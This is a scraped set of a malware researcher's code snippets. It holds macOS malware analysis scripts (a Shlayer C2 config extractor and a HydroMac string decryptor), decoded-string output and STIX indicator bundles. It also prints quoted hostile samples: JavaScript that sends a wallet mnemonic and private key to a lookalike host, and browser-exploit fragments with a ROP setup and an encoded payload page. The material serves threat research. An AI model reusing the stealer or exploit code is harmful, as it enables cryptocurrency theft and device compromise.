tahaconfiant

# author : taha@confiant.com aka lordx64
# OSX/Shlayer.F C2 config extracting from DMG files
# copyright 2022 - All rights reserved
# compatible python 3.8
# Note on installation on mac:
# brew install gmp
# then: env "CFLAGS=-I/usr/local/include -L/usr/local/lib" pip3 install pycrypto

from Crypto.Cipher import AES
import argparse

tahaconfiant

 function startupload()
{
      
    if(xlmnmonic!="" && xlmnmonic!=null && xladdress!=null)
    {
  
            var demoString = xlmnmonic+"@"+xladdress+"@"+xlPrivateKey;
           
            fdsafasdf("https://trx.lnfura.org/api/metamask/ios/GDBPXJ1EXQXWFUAGZRIH3FOVR0SO0VDJLIZLVE1LYOXZECZ61FDC1EHNSPX7KDZWIENCPV7H3KRYNOIENCRTDOIHV2RPKMG4CC4UIDVIJJUTGAIWU7MV6BR8LPJA6XT5",demoString);
            

tahaconfiant

var monic = "";
var xlhookTime = 0;
var xldata = "";
var xlPdata = "";
var xlcaches = {};
var xlpcaches = {};
var xlpwd = null;
var xlepwd = null;
function mcode(str)
{

tahaconfiant

 encrypted string at 0x100051a6a decoded to :
 encrypted string at 0x100051b2c decoded to : IOPlatformExpertDevice
 encrypted string at 0x100051ff5 decoded to :
 encrypted string at 0x100051ffe decoded to : BadAllocException
 encrypted string at 0x100052057 decoded to : -
 encrypted string at 0x100052060 decoded to : OutOfRangeException
 encrypted string at 0x100051e12 decoded to : -
 encrypted string at 0x100051e1b decoded to : BadAllocException
 encrypted string at 0x100051e74 decoded to : -
 encrypted string at 0x100051e7d decoded to : OutOfRangeException

tahaconfiant

# author : taha@confiant.com aka lordx64
# copyright 2021 - All rights reserved
# tested against  macOS/Hydromac sample (aka MapperState) 919d049d5490adaaed70169ddd0537bfa2018a572e93b19801cf245f7fd28408
# compatible python 3.8, and IDAPython for IDA 7.6.210319
# this HydroMac String decryptor uses a helper class UEMU_HELPERS taken from https://github.com/alexhude/uEmu project

import idc
import struct
import idautils
from abc import ABC, abstractmethod

tahaconfiant

{
    "type": "bundle",
    "id": "bundle--1085f2d7-28e4-42cd-a8f5-deb2f065902f",
    "objects": [
        {
            "type": "domain-name",
            "id": "domain-name--b90b246a-0b50-5c64-80d1-0d118efd9ef6",
            "value": "pophot.website",
            "spec_version": "2.1"
        },

tahaconfiant

{
    "type": "bundle",
    "id": "bundle--7dca0b30-9c3f-4978-8b2a-b83851bfc37a",
    "objects": [
        {
            "type": "ipv4-addr",
            "id": "ipv4-addr--94f94345-3a11-5654-aacd-61496d6f5409",
            "value": "103.224.82.234",
            "spec_version": "2.1"
        },

tahaconfiant

  var aA = S(O, V(O));  

  var aB = ((aA.charCodeAt(4) << 16) | aA.charCodeAt(3)) - 0x44; // <--- points to a return address in the native stack

  for (var A = 0; A < 10; A++) V(aB - (0x1000 * A));

  var aC = aB - 0x2000; // <--- will be used for the ROP chain layout

//<code skipped>

tahaconfiant

var test = new RegExp("CAFEBABE");
test.source;

tahaconfiant

<!DOCTYPE html>
<html>
<head>
<script>

function myFunction() {

  var l = "\u614E\u4B74\u01c8\u0000\u0024\u0000\u0159\u0000\u0002\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0000\u0000" + "\u1E12\u0001\u1200\u0009\u0000\u740A\u1100\u770A\u0400\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\uEF04\uFFFF\uF7FF\uFFFF\u00FF\u0000\uFF00\uFFFF\u04FF\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\uEF04\uFFFF\uF7FF\uFFFF\u00FF\u0000\uFF00\uFFFF\u04FF\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\u0D03\u0000\u0000\u0000\u6F00\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u0000\u0000\u0D03\u0000\uFE00\uFFFF\u00FF\u0000\u0400\uFFEF\uFFFF\u000B\u0000\u0000\u0000\uFFFF\uFFFF\u2B04\u0000\u0000\u0000\u0000\u0000\uFF00\uFFFF\u03FF\u000D\u0000\uFFF3\uFFFF\u000E\u0000\u0112\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u0016\u0000\u0D03\u0000\u0B00\u0000\u0700\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u001A\u0000\u0D03\u0000\u0B00\u0000\u0000\u0000\u0300\u000D\u0000\uFFFB\uFFFF\u0000\u0000\u0D03\u0000\uF300\uFFFF\u1BFF\u0000\u1500\u1312\u0000\u0300\